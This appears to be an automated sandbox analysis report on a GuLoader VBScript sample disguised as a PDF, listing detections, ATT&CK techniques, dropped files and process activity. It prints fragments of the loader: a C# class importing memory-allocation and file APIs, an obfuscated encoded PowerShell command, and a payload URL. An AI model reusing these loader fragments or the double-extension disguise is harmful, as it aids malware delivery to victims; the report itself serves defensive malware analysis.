    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common12
    Obfuscated Files or Information
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 625179 Sample: doc_65398086_4190362045539.... Startdate: 12/05/2022 Architecture: WINDOWS Score: 88 22 Found malware configuration 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Yara detected GuLoader 2->26 28 3 other signatures 2->28 8 wscript.exe 2 2->8         started        process3 signatures4 30 Wscript starts Powershell (via cmd or directly) 8->30 32 Very long command line found 8->32 34 Encrypted powershell cmdline option found 8->34 11 powershell.exe 22 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\wwh3pdnv.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    doc_65398086_4190362045539.pdf.vbs19%VirustotalBrowse
    doc_65398086_4190362045539.pdf.vbs20%ReversingLabsScript.Trojan.Valyria
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://vegproworld.com/wp-content/Medalj.vbs0%Avira URL Cloudsafe
    https://go.micro0%URL Reputationsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    https://vegproworld.com/wp-content/Medalj.vbstrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.885692627.0000000004571000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://go.micropowershell.exe, 0000000E.00000002.887074953.0000000004809000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:625179
      Start date and time: 12/05/202213:30:242022-05-12 13:30:24 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 10m 34s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:doc_65398086_4190362045539.pdf.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:23
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal88.troj.evad.winVBS@8/9@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Execution Graph export aborted for target powershell.exe, PID 5504 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      13:34:38API Interceptor25x Sleep call for process: powershell.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
      Category:modified
      Size (bytes):1340
      Entropy (8bit):4.011609440700331
      Encrypted:false
      SSDEEP:24:HZK9oyiy25s+hZHXhKOLmfWI+ycuZhNdakSbPNnq9ed:1y05PZxKYm+1ulda3Rq9+
      MD5:35A06BF865E875C32B726828816967FD
      SHA1:69567D3C9C7E29E87231287DAA08C8C60D881A57
      SHA-256:F5A343919ECF1F8EA925B6C5EA94D82696B3ABB8896A251CE68992E1F623E31F
      SHA-512:2E148251EC07F729554628D576E41B452FDF80AF03E0AAECA367648B3F1415EDEED1C4D6DEFFC2D3A4579114C27C9885BB9713D043451F5F19FD19E79FB96E2C
      Malicious:false
      Reputation:low
      Preview:L...io}b.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP.................#O&W.....eg...k..........7.......C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp.-.<...................'...Microsoft (R) CVTRES.`.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.w.h.3.p.d.n.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\System32\wscript.exe
      File Type:data
      Category:modified
      Size (bytes):57933
      Entropy (8bit):7.415138518303065
      Encrypted:false
      SSDEEP:1536:pZVFWBYYoikwV2sLpHlqDhPf70u82ivgnOsQs:pJWkikwQbVPj0wnOi
      MD5:C550EC97DA0B49DE2EE31A4552D45484
      SHA1:EC31D87E64AB26A00D2E9796A2FAEE787BB32325
      SHA-256:37E778140A816131239F263E917234F92106C4F3EC55EAB1007D75E587815544
      SHA-512:D4CFA10342CD3E3C68976ADD3A538A7A5F3CA190C850A93F767B463E1697B212245602FDB2C0BA39BC6FD1C4C0F8C5B75388393A194AD85F392D0CD6FB683963
      Malicious:false
      Preview:......hG.3W.4$'..q.,$H.-&Z.._1..4..?@t@@@@9.u.W.......p.@t..........s..c........"[..1.4.I...T._.Ry..;.aR...8.............B..R..)....C.Hn.~uyw..%&..h.....GY....R.j..A.].k.~$....O.nNW..cZ..K\.1..,.....l....g.....<..j..k....v..U.1.!...y}`...:B.v.I-..>|4<....J....g.Z..F..!....&<.'.f'.r&.`".w..*......z....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..cY}3.....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.I...S........<P........g......f...;%......6..8....f...w2...p..fJ.MH...X.&MR...#.._...Z......dR.a..8.?@t.?@MH...XN.t.?@..{&.S.50....E?@'"X.......{.!Lt.d.1..<......4f......&.[(/4..5.....=?@.*...T0.CE?@..j.a.Yy...d...=......@..H.k...g.I.?.1.....#.. .$.0.@t.zh....9..EFfp..(?@....t.?&.}...C?@,...u.?...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.....[m...>@t......C.].4d..w$..G.E.hN. .&NXP.)l.:4.,f.-?<%.1KPH...rz8.A.z3..
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.114364084100377
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/ak7YnqqbPN5Dlq5J:+RI+ycuZhNdakSbPNnqX
      MD5:234F2657A7B1DDF2E56567D4D8BB876B
      SHA1:0CB26D0BA763B71C42D69F0819CFF1A1EE003ED5
      SHA-256:2A3BC5C84D045E37E336B2BFE2DCC4F00F5006FD754953C04C87685755054594
      SHA-512:E55530EB08E3945CEC11C8AEF5127A2A0914FDFAB9279710C6C3E3C53D5C956D18B57459E481B0807E88E766C185C02B7B422CFEFB4D194CF1674DAD752F3F75
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.w.h.3.p.d.n.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.w.h.3.p.d.n.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):871
      Entropy (8bit):5.2974065929444025
      Encrypted:false
      SSDEEP:12:V/DGrbhQzPpN+RmgkrWeszPpN9zL2xgS2q5a+HNK+4tO+M6hOQLrOsG:JobSzeRmgkr7iFL2m7q5fHNyhjni
      MD5:B0C4D854DD730B30AEA1BD746BB6FBCD
      SHA1:8BC1444A76D62F0346DAD934B5FF66B6FAB20E81
      SHA-256:A06E857E542E86D49C3D292EE52EE7A26E90C9083486B8AC568D8739D65141F4
      SHA-512:505DB2A1FBDC8BB27C9B46D481F02E52CC7F02EC1A58CCF38ACD7D8780F48B94CE910B371A71B4502826C22B83B2BDA5827FF6E61259DCB484E2F27F9BAF409B
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class ROTATIONFO1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int ROTATIONFO6,ref Int32 TERRA,int Maniokp,ref Int32 ROTATIONFO,int Phonolo,int ROTATIONFO7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Maniokp0,uint Maniokp1,IntPtr Maniokp2,ref Int32 Maniokp3,int Maniokp4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Maniokp5,int Maniokp6);....}
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):377
      Entropy (8bit):5.2616699267879
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23f6ULGzxs7+AEszIcNwi23f6ULQA:p37Lvkmb6KwZiUqWZEJZiUP
      MD5:53AC0DD9C318A4F8E7021C59049C92C1
      SHA1:4628E33182E6FB66285C07AF946931F12FAD2A1C
      SHA-256:C8A3ACFD09130D010F14F12DCEDB11A535F0CFF61B86A9EE0D6B524E6A55FCA1
      SHA-512:D22211B4B3B7029D63CE96C2B5DED3CD9B5332F7446D109B2B9588D8BB525496812143BA59E1FF898972ACC86DF1136A3D44EBEF024F825FC747B31077BDEF5A
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.265178097200224
      Encrypted:false
      SSDEEP:48:6NKIm4L9k7zqbiUcjaceNJ7U1Uf1ulda3RqK:4mEOeHozHvK7
      MD5:BDE0A74665E6E80624CD58A53D7A3B73
      SHA1:72B994DAE7F36145D546C5DBA9A5DA1E2C789069
      SHA-256:F92B9C20A23B6AD7B7FAFA196816023056AADC941D9753DB17D9918E324FF3F1
      SHA-512:820C04E2127B97B34C746BD0B2870690EFAD3964248091301DB6F61F98FFC38F1D7088ED4CC010F7DD6210D2FDBED599D6A8D00C807E8D78EA99738C07AF13CE
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ho}b...........!.................%... ...@....... ....................................@.................................\%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l.......#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................3.,.................m.....m.......................................... :............ E............ J............ b.!.......... g.+.......s.....{................................ ..s.....{...............................
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):879
      Entropy (8bit):5.303346583830233
      Encrypted:false
      SSDEEP:24:Kwqd3ka6KgiULEviU2KaM5DqBVKVrdFAMBJTH:xika67DEveKxDcVKdBJj
      MD5:6020EB7D0DD4DA84EC4EC4C6B1F94F44
      SHA1:DC98EF1DFDAC6A796689FB55A706643BACBF5939
      SHA-256:0F2441D62D336252CACCB2B7BA1164D161BAE35500571BFF85D35792D6176882
      SHA-512:74BE1AAE833E9B04DB6782E0947271CE2A5557AC54A3EB76538C87961CB45DB3EA327F0E748001450E760D095BA9C8D3D2184C0219A1042CF1764DEAD3FB49A0
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      File type:ASCII text, with very long lines, with CRLF line terminators
      Entropy (8bit):4.492131037575922
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:doc_65398086_4190362045539.pdf.vbs
      File size:256454
      MD5:2fc6f3477035823ff7864187b5b2a5cc
      SHA1:8e6db7c18a5725e795d7421baf84cae637fbcc53
      SHA256:74e1b9fa91b0840706b7418b8604d76efab886fec1704b8810ad389aa6a9cb9b
      SHA512:5ae7e5d61f11123fe67841c99046ddad5f8b710a3054943c87acd53ed8438eb41fcf2a913f255e5dae3ea2aef1ce5373fe35897a0ee129b6471c2c11128e2ea7
      SSDEEP:3072:JZ4QJqxguxSEbvyZItIzvQd9EBHBD2WUZ0EZkBY42AjaNBQUkll0Z:JZ4GIgubKTcE2W+QY5jrQjllk
      TLSH:C6449B9182B1AFC891F93EDFCB0E8621B2409E65D3D7F1585AE110BD7FDB2E95306290
      File Content Preview:'Glanduli Tostprogra Spoor4 Altf horologi Beziq1 LITURGY driftsp GROVELLERS OBJURGATO SIPHUNCULU Definers4 skreknivho Badutspri Lote Pleuro spydspid Appl FLAMBERE BLATTOIDB Piete Nonsolub7 pale OSTRAC Farveat2 Stablev4 Skrkrom9 Donnerdse ..'BLOD Paikbi OB
      Icon Hash:e8d69ece869a9ec4
      No network behavior found

      Click to jump to process

      Target ID:0
      Start time:13:31:38
      Start date:12/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs"
      Imagebase:0x7ff634c70000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:14
      Start time:13:34:12
      Start date:12/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# I n s t r u 9   S B E U R T E R N E   S l a n   S p o n t a n 7   U N C A L L   e m b o   r e i t   T a r p a p e   u g i f t e s d   B A C K S T A I R   e g o i t y h   S m e d   U R O G E N   v a s o r r h a p   A m e t r o   P A R A P H R A S T   K r y m m e l l o c 2   I N T E R S P I R   U n s q u e 6   j a c o b i t i s   P H O N O P H   A b s c o n d e r s 7   C h i k i t a o p s   S K Y G G   D O M M E D A G S   n o n a s s i s t a   A r c h c h e   t v i v   K a p r i f o l i   F i n a n s t i    
 # T r i p p e t s   M l k e 2   n o n e x p l o r   F O L K E C E   A r v e f l g e   F A S T P R I S S Y   H o g g w 6   R e p e t 4   H A L V O N K L E   A r b e j d s   P L O T T E R   T s e d    
 # D y n a m i k k e n 7   S T K Y S T T   H y d r o n i t 5   r e d i s t r i   m e r i c a r   v i p p   F a b r 1   F L O V M A   A A N D S H O   S t a a l s t u   J E S U I   T a n a   C o m m o   G u a p i n o   S y n k r o n 7   d e v l i n r e t   O m s t n i n g s g   R e s e 2   m e t r o l o   S U G E N E K D B O   S v i r p e t s u m 1   h y d r a t e r   O B S E R V A   T E M P A N A   V I K I N G E R   u p r i v e e k s   h e a r t b   E m b e d   U N A S S E N   O P K L A   e e b r e e r e   P i c r i t i c 3    
 # E E L I E S T   C r y s t a l o g 1   D U S I N M E   I n d i v 8   u d s k r i f t s p   T e k n o k r a 1   t y n d t f   E l e v t i m e 6   d y k s v   b o n b o n e r s   a n t i c a p i t   u n d e r   v i e r   Y D E R P   K l b e b a a n d 9   V i p s t 4   M a x i m o n   A p p r a i s e 4   A R T I G E R    
 # U D S K R I D N   z i t a s   s p a n k   T i p p e r h o 6   s c r o l   F n i s r   F R A S I G E   d i e t i c i a   h a a n   S p a a m n d s 1   s e r v i   L e d s a g e m u   U n d e r k e n d t 7   S a n d p 4   k a p s l e r b a s   d i s r   P R O P   r o s s e   F o r k l a 9    
 # T r a n s i s t o r 1   W A R D   D o m s f o 3   B A J A D S E N   K A R A K T E R B   c h l o   I s o c   O r o n t i u m 3   E q u i p p e 7   E p i g r a m r   M a t t i s p u   S h o p p i n g e   R E T I   D E O R S U M V   a l m u   G r a v h u   F o r s g 8   T H I R   L I T O G R A F R A   S t r a   d i s t r i   S P L I C E A B   g r i t m e d i   l s e a d g a   K A T A P U   m a n i   P a r e n t h o o   u d s v i    
 # S a m l i v s 5   a m b i   u r o o t w o s   R e s i s t i n g l 7   t r a n s p o r t a   s p e j l i n g   N A T I O N A L   E n d e v e n 6   R O L L E   U n i n t e l l 6   m o d e   S e c t i o n a l l 7   U n s e r 9   F e r r y s l o    
 # T A N D B R   f r i o   T i l l i d 7   P r o g y p 9   H A V E B R   m a u g e r a s s   b e m a l i n g c o   H e t e r o m o r p 2   S n a p r e   A B N E   L y s d d   U n d e r    
 # M U L L E I N S   M a g d a l 4   N O N C R Y S T   H o e j r 5   B U N I N G E   S W I D G   f o r p a g t   T Y P E G O D   S M A A P A R T I   U N D E R S K O V D   S k o l e g   a r u s h a   c o a t   B e k y m r e 5   s n i g g e r e r a   N A B O   V A T T E T S   P a r a t 6   R A B A T   M i s d e s c r i b   P E N S I   T a m r a 8   P R V E L S    
 # T o b a n t i h 5   p o t o r o o s i k   D o r s o i n t   a n f a   Q u a d r i r e   k i l o v a r e   B L A N K L A K S   H A F F   T r a e k v o g n e   S I G N   R e s c i   p a n t e n d e s a   R a d i a l g a d 3   e m b r o i d e r   T o l r e r 1   L e v i g a   S k r u 5   A f l a d e e n   U n g l a 9   A e r o s o l e 3    
 # A f r i k a n d e   M e d l 4   o b s t   a n s t d e   a c c e l e r a t i   s i l i c   I n d e k l 3   K n e b l i n g e   N o t o d o n   P a c u n o n s   B a r i u m m   U n d e 6   p o l a   b o o b o o s h a   D e x t r o r o t   T a w i e o p e r a   C r e s s y r u t s   T e x t u i s t b 6   M a z h   M i c r   d i f f e r e n c   N O N S C H I S   I n o h e s 6   H I L D I M I T A   M e t a i n   a n t i c y    
 # E p i l d o d e c   U p b l o w p h y l   p r e t r e a t   r e a c c   Y e l l o w   s u b s t r a   S T A B I   F R O S T   T r e s t l e f r a    
 # p r e e x t i   S R I N T E   S k a m f i l 3   H a l k a h s m i d   A l e b e n   t e l e f o n   S a a t e r p a l   T W E N   D r t r s 6   R E M O   A M P H I C    
 # B r o v 4   B a g p e r r o n   S H A D O W L I K E   M o e u r s f l   U s a n d h e 5   S t i f t s f r   S e p i o n o p f 2   S t e n g a l l e n 5   T v i v 9   v i a l m a k e   A r b e   R e p i l 9   A u t h v   B l e a 8   F o t o 6   b a n k d i r e   O e d e 1   p u y a l   D e p r e s 3   C A N N    
 # U n d e r   V i s k e i 8   S e x i v a l e n c   P u n d i   k r a v m e   D e c a l c   G o l d c u p   I m p e 1   U D P E G E S O P S   t i n s y k o   e s s e n t i a   S t o r h 3   V i r k s o m   O K A P I S S T R I   M o n e t i t e 7   S Y R I N G E N S   K o n f u s i o n e 9   T o m e r w h e e l 3   H A V E N E R S H   B r a i    
 # K O N F I T U R E   F o o t h o l d   B I L B O Q U E T   S h i f t a b l e 9   O u t s   v e n s t r e l i   F L A D S Y N   G E N E R A L S   S N O G E S   M I T U O P S T   S I D T   T r o l d d   C a r d i   m e n s   r n n e b o   X X X V I   a d d s t o l   p a r b   S a l m   H Y L A G Y   T i l s n i g e 9   D o u c e p e 1   R a r e f i 3   P o s s   N o n a r y o p t   P h o t o r a d i   M e d a 2   e q u i n o x   A M B U L A T I   A L G E B R A   I n t r a n s    
 # W O O D R   M i n i   F o r h i n   V l g e r n e c o   R A T A   v u l p i   O m v u r d e r i   O B S E R V A T I   T u b b e r o   T y p e 2   H O R N P I P E I C   g r u n d   f r y s   n o n l a r c e n o   t i t o   S c e n a r i e t e   P a r a p r 3   A d s c 7   S T R A F U D   N e d r a k k   M A I L A B I L I   S m a a l i g h   S K E H E J R E   A f g a n g s   B E A R D E   B E N G   f e d e r a c   k l d e b r s t   v o v s    
 # b a r o m   L u f t f a r t 3   t e l e s   C H A L O   U n i f i e s s a   S k r a a p a   U n a d   n a s a l i   l a u g e   F o r v a s k 4   B a t a t e r n e o 7    
 # P A U C I   f o r h o e   D i s r o   D e b o u c h m e 9   T e l e 2   C o l l u d e b o a 4   C E L I O S C H   T i l k e n d t   A p h o r   C o m b i n d d o p   D I S P E R S I O N   K o n t i n u a t i 2   U n c l e r k l i 2   F U L D T I D   T o x o t 6   R a n k n e s s   M o n o t y p 6   N e u r o 4   n e u r o p h i l   h e l s t e n s   S T R A P N I N   H u d e 3   O E V R E    
 # t o m c   K O N F O R M   C i t r o n p r e s   P o s i t i v e l y   H E M O M   S k g p 9   s p r o g u   A n t i m   S N O O P E R   I s o t e r e i 7   C U R L I E W U R L   f a g s    
 # A F T E   D r e j e   B i f a n g s t m a   I r r e c o g n 4   C B C M S M U D   s s o n s v i n   R a n d 2   V e d e r h f t i 3   n o n a n a l o   c e r u l e i t   D g n c e n   a r t h e   F i n a n s   F r u e f r a k   P A L M E B   S a a m a s k   O p t a n t e   L o c h i o s   S e j r s f a n e 7   F r o n t i n g l 7   P O K A L   D I N B   d i s s   v a t f   T a r z a n u 7   e l e c t r o g a   V I Z A R D   i n t e   A n v e n   C a t e c h i 7    
 # D R O S S E L K   F A R V E H A N D L   T E K S T B E H A   S p e d i t 7   G e s t u r a p 8   B r e e c h e d b o 7   d i s s e n t   H I N G E   K O N D I C Y K L E   t a n k   f a g o t t e   V u l t u r o u s   K o h l a n 3   T r i u m   B O S S A G E   k a t a s t r o   M o z a m b 5   t u n i n g s s t   A c f t m   B a k k e n b a r 6   a f s t   A f s t n i n g   B r o b u e 6   S a p p h    
 # S C L E   G R A N I T T E R N   M a n a n e 6   E m p r i s e p a 6   u r u g u a   S m a a 8   N o n p a p i s 4   K L A S S I   s v a g h    
 # O V E R N I   s t e r   T E I I D A E   U N G T J E N   C o n t r a c t i v   u n e q u i t a   G a s p a   Z O O M E C H A   O V E R P O P U L O   C E R T   L i q f r a p 2   I M P R O V   j a c t u r a s k   S l o w c o a c   B L A D S Y S   u n c l a s p   K A G E K   S E M M E S S K O R   V O L C A N I Z   a n t i s   K o n t o r 6   B U T I K S C E N   S h o u l d 4   M i l j a d m i 2   U r e d i n o 1   g a l l o n s t    
 # A F K A   S T Y R I N G S M I   U n i v e r s 5   M a i n v i c k i 6   B L O K H   G E J L E R O S S   b i s s e   U d h u l   K l u n k v i p 2   S t r u t h b r 1   v e r s   O R I G I N A L F R   M a n i 3   O u t r i b b 6    
 # m e j e t c h a   S i k k   k e r n e l l i n   B i b l i o g r   G a d e h   s m o k   B a r f o d e d e s 8   r e t u r n e r i n   S c a p e l e s s   s q u a l   K o n f o 1   G L U T I   R i g e t s f a r 5   O B S E R V A   A l i m e n t a t    
 # G e n n   P a n d   G O L D E N W I N G   R e d n i n g s h o   U D F R I E L   B e a r a b i l i   M e d l   T e m p o e r s f i   S p i r i t u s 5   s t r a n   F L O P P Y D   u n a a d i g t   M A S K E P R   B e s v e g o   L j t n   H y s t r   p a t e n t r e t   T i d s f 3   t o r i d   l i l a p l e a c h   S c h o o d 6   T o i l e 9   O p s u m m e r e 8   S c i r 3   H y d r o r h i z a   U N D S I G   G U N J B R A   I r e t t e s t t e 7    
 # U N A P P R   M I N E   P a i n   F O R U   P R E S E R V   b a g s t r b   U n n a r c   u n i m p u g n e   L a n d e j e n d o   T r o l d e r 8   O p b y   E N T R E D R   L n g o d t g r e   M A R R Y   v g t f   C l o t u r i n 7   s l y n g e l s t r    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   R O T A T I O N F O 1  
 {  
